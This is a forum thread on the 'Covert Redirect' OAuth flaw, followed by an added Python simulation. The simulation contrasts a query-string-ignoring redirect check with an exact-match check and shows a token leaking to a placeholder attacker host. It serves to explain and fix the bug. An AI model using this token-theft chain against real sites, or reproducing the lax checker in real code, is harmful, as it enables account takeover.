

Homakov on Covert Redirect OAuth exploit - woloski
http://homakov.blogspot.com.ar/2014/05/covert-redirect-faq.html

======
jfroma
Basically the vulnerability is on the Facebook side. Every OAuth provider has
a list of "allowed redirect URIs"; a good OAuth provider will check the entire
URL, but Facebook doesn't check the query string in the URL. If you have a
list of allowed redirects like:

- http://foo.com
- http://foo.com/foo

Facebook accepts redirects like:

- http://foo.com?anything_here=xx

And if the client has an open redirect (some query string parameter that redirects
anywhere), combined with response_type=token, the evil website can get the token.
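
The chain jfroma describes, as an added example that is not part of the thread and not Facebook's or any real provider's code: a lax redirect_uri check that compares only scheme, host and path (ignoring the query string) beside the exact-match check RFC 6749 §3.1.2.3 calls for, a client at foo.com with an open redirect, and a browser that carries the URL fragment (where response_type=token puts the access token) across the client's 302. The registered URIs are the two from the comment; the open-redirect parameter name `next`, the host `evil.example` and the token value are assumptions made for the example.

```python
from urllib.parse import urlsplit, parse_qs

# Redirect URIs registered for the OAuth client "foo.com" (taken from the comment).
REGISTERED_REDIRECT_URIS = {
    "http://foo.com",
    "http://foo.com/foo",
}


def _normalize_path(path):
    # Treat "http://foo.com" and "http://foo.com/" as the same path.
    return path or "/"


def lax_redirect_ok(redirect_uri, registered=REGISTERED_REDIRECT_URIS):
    """Match scheme, host and path only; the query string is ignored.

    This models the behaviour the comment attributes to Facebook: any
    query string can be appended to a registered URI and still pass.
    """
    r = urlsplit(redirect_uri)
    for allowed in registered:
        a = urlsplit(allowed)
        if (r.scheme, r.netloc, _normalize_path(r.path)) == (
            a.scheme, a.netloc, _normalize_path(a.path)):
            return True
    return False


def strict_redirect_ok(redirect_uri, registered=REGISTERED_REDIRECT_URIS):
    """Exact string comparison against the registered list, the check
    RFC 6749 section 3.1.2.3 requires when a full URI was registered."""
    return redirect_uri in registered


def client_open_redirect(request_url, open_param="next"):
    """Model the open redirect on foo.com: return the Location the client
    would 302 to, or None when the (assumed) 'next' parameter is absent."""
    params = parse_qs(urlsplit(request_url).query)
    targets = params.get(open_param)
    return targets[0] if targets else None


def follow_redirect_with_fragment(current_url, location):
    """Browsers keep the current URL's fragment when following a redirect
    whose Location carries no fragment of its own, so a fragment-delivered
    token survives the hop to the next site."""
    cur = urlsplit(current_url)
    loc = urlsplit(location)
    if cur.fragment and not loc.fragment:
        return location + "#" + cur.fragment
    return location


def simulate_implicit_flow(redirect_uri, checker, token="TOKEN123"):
    """Return the URL the browser finally lands on (fragment included),
    or None when the provider rejects redirect_uri.

    With response_type=token the provider appends the access token in
    the fragment of redirect_uri; the client then redirects wherever its
    open-redirect parameter points, and the fragment rides along.
    """
    if not checker(redirect_uri):
        return None
    landing = redirect_uri + "#access_token=" + token
    location = client_open_redirect(landing)
    if location is None:
        return landing
    return follow_redirect_with_fragment(landing, location)


if __name__ == "__main__":
    evil = "http://foo.com/?next=http://evil.example/collect"
    print("lax   :", simulate_implicit_flow(evil, lax_redirect_ok))
    print("strict:", simulate_implicit_flow(evil, strict_redirect_ok))
```

Run as written, the lax checker lets `http://foo.com/?next=http://evil.example/collect` through and the token ends up at `http://evil.example/collect#access_token=TOKEN123`; the strict checker rejects that redirect_uri outright while still accepting the registered `http://foo.com/foo`. Note that fixing the open redirect on foo.com alone is not enough for other clients: the provider-side exact match is what closes the class of bug.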

